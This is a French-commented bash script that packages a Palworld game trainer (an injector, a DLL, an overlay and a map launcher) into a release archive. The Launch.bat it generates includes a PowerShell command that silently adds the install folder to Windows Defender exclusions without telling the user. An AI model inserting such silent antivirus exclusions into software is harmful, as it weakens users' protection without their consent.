#!/usr/bin/env bash
# Compilation et packaging de PalTrainerUltra pour la release.
set -e

ROOT="$(cd "$(dirname "$0")/.." && pwd)"
DIST="$ROOT/dist"

echo "Packaging des composants..."

echo "Génération des icônes de la mini-carte..."
mkdir -p "$DIST/assets/icons"
declare -A ICON_MAP=(
    [fastTravelPoint]="T_icon_compass_FTtower.webp"
    [towerTravelPoint]="T_icon_compass_tower.webp"
    [dungeon]="T_icon_compass_dungeon.webp"
    [egg]="T_icon_compass_egg.webp"
    [treasure]="T_icon_compass_treasure.webp"
    [strongEnemy]="T_icon_enemy_strong.webp"
    [bounty]="T_icon_compass_Bounty.webp"
    [enemyCamp]="T_icon_compass_EnemyCamp.webp"
    [oilrig]="T_icon_compass_Oilrig.webp"
    [base]="T_icon_compass_camp.webp"
)
for type in "${!ICON_MAP[@]}"; do
    src="$ROOT/web/assets/map/${ICON_MAP[$type]}"
    dst="$DIST/assets/icons/${type}.bmp"
    if [ -f "$src" ]; then
        ffmpeg -y -i "$src" -pix_fmt bgra "$dst" >/dev/null 2>&1 || true
    fi
done

echo "Copie des fichiers d'exécution dans dist..."
mkdir -p "$DIST/assets" "$DIST/server" "$DIST/web" "$DIST/data"
cp "$ROOT/PalTrainerCore.dll" \
   "$ROOT/PalTrainerInjector.exe" \
   "$ROOT/PalOffsetScanner.exe" \
   "$ROOT/PalTrainerOverlay.exe" \
   "$ROOT/PalTrainerMiniMap.exe" \
   "$ROOT/PalTrainerLauncher.exe" \
   "$ROOT/src/trainer/runtime_offsets.json" \
   "$DIST/"
cp -r "$ROOT/assets/icons/." "$DIST/assets/icons/" 2>/dev/null || true

# Copy map textures (pre-generated by CI or local build)
echo "Copie des textures de carte..."
mkdir -p "$DIST/assets/maps"
if [ -d "$ROOT/assets/maps" ]; then
    cp "$ROOT/assets/maps/"*.rgba "$DIST/assets/maps/" 2>/dev/null || true
fi
# If no .rgba files found, try generating from webp
if [ ! -f "$DIST/assets/maps/map_2048.rgba" ]; then
    echo "Textures pre-built non trouvées, génération depuis webp..."
    ROOT_WIN=$(cygpath -w "$ROOT" 2>/dev/null || echo "$ROOT")
    DIST_WIN=$(cygpath -w "$DIST" 2>/dev/null || echo "$DIST")
    python -c "
from PIL import Image
import os
maps = [
    (r'${ROOT_WIN}/web/assets/map/palworld-map.webp', r'${DIST_WIN}/assets/maps/map'),
    (r'${ROOT_WIN}/web/assets/map/palworld-treemap.webp', r'${DIST_WIN}/assets/maps/map_tree'),
]
sizes = [2048, 4096, 8192]
for src, dst in maps:
    if not os.path.exists(src):
        print(f'WARNING: {src} not found, skipping')
        continue
    img = Image.open(src).convert('RGBA')
    for sz in sizes:
        out = f'{dst}_{sz}.rgba'
        resized = img.resize((sz, sz), Image.LANCZOS)
        with open(out, 'wb') as f:
            f.write(resized.tobytes())
        print(f'  Generated: {out} ({os.path.getsize(out)//1024//1024}MB)')
print('Map textures generated!')
" 2>&1 || {
    echo "WARNING: Python/PIL not available, copying any existing .rgba from web/"
    cp "$ROOT/web/assets/map/"*.rgba "$DIST/assets/maps/" 2>/dev/null || true
}
fi
cp "$ROOT/scripts/inject.bat" "$ROOT/scripts/start_map.bat" "$DIST/" 2>/dev/null || true
cp "$ROOT/server/server.py" "$DIST/server/"
cp -r "$ROOT/web/"* "$DIST/web/"
cp "$ROOT/data/pal_spawns.json" "$ROOT/data/pal_database.json" "$DIST/data/" 2>/dev/null || true

# Scripts utilitaires
mkdir -p "$DIST/scripts"
cp "$ROOT/scripts/breeding_calculator.py" "$ROOT/scripts/save_editor.py" "$DIST/scripts/"

# Documentation
mkdir -p "$DIST/docs"
cp "$ROOT/docs/"*.md "$DIST/docs/"
cp "$ROOT/README.md" "$DIST/"

# Icône du dossier + desktop.ini pour l'icône auto
cp "$ROOT/src/overlay/palmods.ico" "$DIST/"
cat > "$DIST/desktop.ini" << 'INIEOF'
[.ShellClassInfo]
IconResource=palmods.ico,0
[ViewState]
Mode=
Vid=
FolderType=Generic
INIEOF

# Exécutable unique de style WeMod
cp "$DIST/PalTrainerOverlay.exe" "$DIST/PalTrainerUltra.exe"

# Launch.bat — démarre le launcher centralisé
cat > "$DIST/Launch.bat" << 'BATEOF'
@echo off
cd /d "%~dp0"

if not exist "PalTrainerLauncher.exe" (
    echo ERREUR: PalTrainerLauncher.exe introuvable !
    echo Vous devez extraire l'archive complete dans un dossier avant de lancer.
    pause
    exit /b 1
)
if not exist "assets\maps\map_2048.rgba" (
    echo AVERTISSEMENT: Textures de carte manquantes - la minimap ne fonctionnera pas.
    echo Assurez-vous d'avoir extrait l'archive complete.
    pause
)

REM Ajouter le dossier aux exclusions Windows Defender (silencieux si deja exclu)
powershell -Command "Add-MpPreference -ExclusionPath '%~dp0' -ErrorAction SilentlyContinue" 2>nul

PalTrainerLauncher.exe
BATEOF

# Création des fichiers JSON par défaut s'ils sont absents
[ -f "$DIST/paltrainer.json" ] || echo '{"ready":false}' > "$DIST/paltrainer.json"
[ -f "$DIST/commands.json" ] || echo '{}' > "$DIST/commands.json"

# Vérification des fichiers critiques
echo "Vérification des fichiers critiques..."
for q in 2048 4096 8192; do
    if [ ! -f "$DIST/assets/maps/map_${q}.rgba" ]; then
        echo "WARNING: dist/assets/maps/map_${q}.rgba MANQUANT"
    else
        echo "OK: map_${q}.rgba present"
    fi
    if [ ! -f "$DIST/assets/maps/map_tree_${q}.rgba" ]; then
        echo "WARNING: dist/assets/maps/map_tree_${q}.rgba MANQUANT"
    else
        echo "OK: map_tree_${q}.rgba present"
    fi
done
if [ ! -f "$DIST/assets/maps/map_2048.rgba" ]; then
    echo "ERREUR FATALE: map_2048.rgba MANQUANT - la minimap ne fonctionnera pas!"
    exit 1
fi
if [ ! -f "$DIST/PalTrainerLauncher.exe" ]; then
    echo "ERREUR: PalTrainerLauncher.exe MANQUANT !"
    exit 1
fi
echo "OK: Fichiers critiques vérifiés."

echo "Création de l'archive de release..."
rm -f "$ROOT"/PalTrainerUltra-*.zip "$ROOT"/PalTrainerUltra-*.tar.gz
VERSION=$(date +%Y%m%d-%H%M%S)
ARCHIVE="$ROOT/PalTrainerUltra-$VERSION.zip"

cd "$ROOT"
rm -rf PalTrainerUltra
cp -r dist PalTrainerUltra

if command -v zip &>/dev/null; then
    rm -f "$ARCHIVE"
    zip -r "$ARCHIVE" PalTrainerUltra/ >/dev/null
    rm -rf PalTrainerUltra
    echo "Créée : $ARCHIVE"
else
    tar -czf "$ROOT/PalTrainerUltra-$VERSION.tar.gz" PalTrainerUltra/
    rm -rf PalTrainerUltra
    echo "Créée : $ROOT/PalTrainerUltra-$VERSION.tar.gz"
fi

echo "Packaging terminé."
